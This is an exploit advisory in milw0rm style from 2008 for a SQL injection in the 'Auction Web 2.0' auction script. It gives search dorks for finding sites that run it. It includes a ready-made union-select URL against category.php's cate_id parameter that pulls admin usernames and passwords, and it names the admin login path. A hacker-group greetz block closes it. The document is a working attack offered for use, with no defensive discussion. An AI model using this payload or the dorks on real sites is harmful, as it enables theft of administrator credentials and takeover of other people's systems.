40 lines
No EOL
1.7 KiB
Text
40 lines
No EOL
1.7 KiB
Text
#########################################################
|
|
#
|
|
# Auction Web 2.0 SQL Injection Vulnerability
|
|
#========================================================
|
|
# Author: Hussin X =
|
|
# =
|
|
# Home : www.tryag.cc/cc =
|
|
# =
|
|
# email: darkangel_g85[at]Yahoo[DoT]com =
|
|
# hussin.x[at]hotmail[DoT]com =
|
|
# =
|
|
#=========================================================
|
|
# HomE script : http://www.ajauctionpro.com/ajhome.php
|
|
#
|
|
# Demo : http://www.ajauctionpro.com/auction_web2.0/
|
|
#
|
|
# DorK : Powered By AJ Auction Web
|
|
# DorK : Powered By Auction Web
|
|
#
|
|
##########################################################
|
|
|
|
Exploit:
|
|
|
|
http://localhost.com/[PaTs]/category.php?cate_id=-1+union+select+1,concat(user_name,0x3a,password),3,4+from+admin--
|
|
|
|
|
|
Admin login
|
|
|
|
admin/index.php
|
|
|
|
################################################################################
|
|
#####################################( Greetz )#################################
|
|
# #
|
|
# tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUA #
|
|
# mos_chori / Rafi / FAHD / Iraq Hackers / #
|
|
# #
|
|
#################################(and All IRAQIs)###############################
|
|
################################################################################
|
|
|
|
# milw0rm.com [2008-06-19] |